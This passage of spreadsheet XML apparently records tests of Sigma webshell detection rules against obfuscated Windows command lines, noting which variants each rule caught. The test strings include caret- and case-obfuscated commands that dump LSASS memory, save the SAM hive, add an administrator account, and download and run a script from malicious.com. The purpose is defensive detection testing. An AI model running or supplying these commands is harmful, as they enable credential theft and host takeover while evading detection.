        <v>1</v>
      </c>
      <c r="H1399" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1399" s="43" t="n"/>
      <c r="J1399" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1399" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1400" ht="15.75" customHeight="1" s="42">
      <c r="A1400" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1400" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1400" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1400" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1400" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F1400" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1400" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1400" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1400" s="36" t="n"/>
      <c r="J1400" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1400" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1401" ht="15.75" customHeight="1" s="42">
      <c r="A1401" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1401" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1401" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1401" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1401" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C w^hoami&amp;echo [S]</t>
        </is>
      </c>
      <c r="F1401" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1401" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1401" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1401" s="43" t="inlineStr">
        <is>
          <t>Local Accounts Discovery (502b42de-4306-40b4-9596-6f590c81f073); Whoami Utility Execution (e28a5a99-da44-436d-b7a0-2afc20a5f413)</t>
        </is>
      </c>
      <c r="J1401" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1401" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1402" ht="15.75" customHeight="1" s="42">
      <c r="A1402" s="43" t="inlineStr">
        <is>
          <t>t1505.003</t>
        </is>
      </c>
      <c r="B1402" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_chopper</t>
        </is>
      </c>
      <c r="C1402" s="36" t="inlineStr">
        <is>
          <t>Chopper Webshell Process Pattern</t>
        </is>
      </c>
      <c r="D1402" s="36" t="inlineStr">
        <is>
          <t>fa3c117a-bc0d-416e-a31b-0c0e80653efb</t>
        </is>
      </c>
      <c r="E1402" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "&amp;wh^oami&amp;ec^ho"</t>
        </is>
      </c>
      <c r="F1402" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1402" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1402" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1402" s="43" t="n"/>
      <c r="J1402" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1402" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1403" ht="15.75" customHeight="1" s="42">
      <c r="A1403" s="43" t="n"/>
      <c r="B1403" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1403" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1403" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1403" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F1403" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1403" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1403" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1403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1403" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1403" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1404" ht="15.75" customHeight="1" s="42">
      <c r="A1404" s="36" t="n"/>
      <c r="B1404" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1404" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1404" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1404" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /C r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F1404" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1404" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1404" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1404" s="43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(ffa6861c-4461-4f59-8a41-578c39f3f23e); LSASS Dump Keyword In CommandLine (ffa6861c-4461-4f59-8a41-578c39f3f23e); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9)</t>
        </is>
      </c>
      <c r="J1404" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1404" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1405" ht="15.75" customHeight="1" s="42">
      <c r="A1405" s="43" t="n"/>
      <c r="B1405" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1405" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1405" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1405" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F1405" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1405" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1405" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1405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1405" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1405" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1406" ht="15.75" customHeight="1" s="42">
      <c r="A1406" s="36" t="n"/>
      <c r="B1406" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1406" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1406" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1406" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" r^undll32.exe C:\Windows\System32\com^svcs.dll, MiniDump 600 C:\lsass.dmp full</t>
        </is>
      </c>
      <c r="F1406" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1406" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1406" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1406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1406" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1406" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1407" ht="15.75" customHeight="1" s="42">
      <c r="A1407" s="36" t="n"/>
      <c r="B1407" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1407" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1407" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1407" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F1407" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1407" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1407" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1407" s="43" t="n"/>
      <c r="J1407" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1407" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1408" ht="15.75" customHeight="1" s="42">
      <c r="A1408" s="36" t="n"/>
      <c r="B1408" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1408" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1408" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1408" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F1408" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1408" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1408" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1408" s="43" t="n"/>
      <c r="J1408" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1408" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1409" ht="15.75" customHeight="1" s="42">
      <c r="A1409" s="36" t="n"/>
      <c r="B1409" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1409" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1409" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1409" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /C reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F1409" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1409" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1409" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1409" s="36" t="n"/>
      <c r="J1409" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1409" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1410" ht="15.75" customHeight="1" s="42">
      <c r="A1410" s="36" t="n"/>
      <c r="B1410" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1410" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1410" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1410" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" reg s^ave HKLM\SAM C:\temp\sam.save</t>
        </is>
      </c>
      <c r="F1410" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1410" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1410" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1410" s="36" t="n"/>
      <c r="J1410" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1410" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1411" ht="15.75" customHeight="1" s="42">
      <c r="A1411" s="36" t="n"/>
      <c r="B1411" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1411" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1411" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1411" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F1411" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1411" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1411" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1411" s="36" t="n"/>
      <c r="J1411" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1411" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1412" ht="15.75" customHeight="1" s="42">
      <c r="A1412" s="36" t="n"/>
      <c r="B1412" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1412" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1412" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1412" s="36" t="inlineStr">
        <is>
          <t>cmd.exe -"c" "n^e^t u^s^e^r t^e^s^t^u^s^e^r P^a^s^s^w^o^r^d /a^d^d"</t>
        </is>
      </c>
      <c r="F1412" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1412" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1412" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1412" s="36" t="n"/>
      <c r="J1412" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1412" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1413" ht="15.75" customHeight="1" s="42">
      <c r="A1413" s="36" t="n"/>
      <c r="B1413" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1413" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1413" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1413" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\comsvcs.dll C:\Windows\Temp\c.dll &amp;&amp; rundll32.exe C:\Windows\Temp\c.dll, MiniDump 500 lsass.bin</t>
        </is>
      </c>
      <c r="F1413" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1413" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1413" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1413" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity (e593cf51-88db-4ee1-b920-37e89012a3c9); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1413" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1413" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1414" ht="15.75" customHeight="1" s="42">
      <c r="A1414" s="36" t="n"/>
      <c r="B1414" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1414" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1414" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1414" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F1414" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1414" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1414" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1414" s="43" t="n"/>
      <c r="J1414" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1414" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1415" ht="15.75" customHeight="1" s="42">
      <c r="A1415" s="43" t="n"/>
      <c r="B1415" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1415" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1415" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1415" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -c "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F1415" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1415" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1415" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1415" s="43" t="n"/>
      <c r="J1415" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1415" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1416" ht="15.75" customHeight="1" s="42">
      <c r="A1416" s="43" t="n"/>
      <c r="B1416" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1416" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1416" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1416" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -comMAnD "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F1416" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1416" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1416" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1416" s="43" t="n"/>
      <c r="J1416" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1416" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1417" ht="15.75" customHeight="1" s="42">
      <c r="A1417" s="43" t="n"/>
      <c r="B1417" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1417" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1417" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1417" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -COmmANd "Add-LocalGroupMember -Group 'Administrators' -Member 'testuser'"</t>
        </is>
      </c>
      <c r="F1417" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1417" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1417" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1417" s="43" t="n"/>
      <c r="J1417" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1417" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1418" ht="15.75" customHeight="1" s="42">
      <c r="A1418" s="43" t="n"/>
      <c r="B1418" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1418" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1418" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1418" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NoProfile -Command "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1418" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1418" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1418" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1418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418" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1418" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1419" ht="15.75" customHeight="1" s="42">
      <c r="A1419" s="43" t="n"/>
      <c r="B1419" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1419" s="43" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1419" s="43" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1419" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nop -cOmMaNd "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1419" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1419" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1419" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1419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419" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1419" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1420" ht="15.75" customHeight="1" s="42">
      <c r="A1420" s="36" t="n"/>
      <c r="B1420" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1420" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1420" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1420" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nOpRoFiLE -COmmAnD "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1420" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1420" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1420" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1420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420" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1420" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1421" ht="15.75" customHeight="1" s="42">
      <c r="A1421" s="36" t="n"/>
      <c r="B1421" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1421" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1421" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1421" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -nopRoFIle -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1421" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1421" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1421" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1421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421" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1421" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1422" ht="15.75" customHeight="1" s="42">
      <c r="A1422" s="36" t="n"/>
      <c r="B1422" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_hacking</t>
        </is>
      </c>
      <c r="C1422" s="36" t="inlineStr">
        <is>
          <t>Webshell Hacking Activity Patterns</t>
        </is>
      </c>
      <c r="D1422" s="36" t="inlineStr">
        <is>
          <t>4ebc877f-4612-45cb-b3a5-8e3834db36c9</t>
        </is>
      </c>
      <c r="E1422" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -noprOFiLe -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')"</t>
        </is>
      </c>
      <c r="F1422" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1422" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1422" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1422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422" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1422" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1423" ht="15.75" customHeight="1" s="42">
      <c r="A1423" s="36" t="n"/>
      <c r="B1423" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1423" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1423" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1423" s="43" t="inlineStr">
        <is>
          <t>ping.exe /n 4 10.10.10.10</t>
        </is>
      </c>
      <c r="F1423" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1423" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1423" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1423" s="43" t="n"/>
      <c r="J1423" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1423" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1424" ht="15.75" customHeight="1" s="42">
      <c r="A1424" s="43" t="n"/>
      <c r="B1424" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1424" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1424" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1424" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F1424" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1424" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1424" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1424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424" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1424" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1425" ht="15.75" customHeight="1" s="42">
      <c r="A1425" s="43" t="n"/>
      <c r="B1425" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1425" s="43" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1425" s="43" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1425" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eC JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F1425" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1425" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1425" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1425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425" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1425" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1426" ht="15.75" customHeight="1" s="42">
      <c r="A1426" s="36" t="n"/>
      <c r="B1426" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1426" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1426" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1426" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -Ec JAB0AD0AMQA=</t>
        </is>
      </c>
      <c r="F1426" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1426" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1426" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1426" s="43" t="inlineStr">
        <is>
          <t>Suspicious Encoded PowerShell Command Line (ca2092a1-c273-4878-9b4b-0d60115bf5ea); Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Suspicious Execution of Powershell with Base64 (fb843269-508c-4b76-8b8d-88679db22ce7)</t>
        </is>
      </c>
      <c r="J1426" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1426" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1427" ht="15.75" customHeight="1" s="42">
      <c r="A1427" s="36" t="n"/>
      <c r="B1427" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_webshell_recon_commands_and_processes</t>
        </is>
      </c>
      <c r="C1427" s="36" t="inlineStr">
        <is>
          <t>Webshell Detection With Command Line Keywords</t>
        </is>
      </c>
      <c r="D1427" s="36" t="inlineStr">
        <is>
          <t>bed2a484-9348-4143-8a8a-b801c979301c</t>
        </is>
      </c>
      <c r="E1427" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe -"c" "wmic /node:localhost process call create 'cmd.exe /c dir C:\'"</t>
        </is>
      </c>
      <c r="F1427" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1427" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1427" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1427" s="43" t="inlineStr">
        <is>
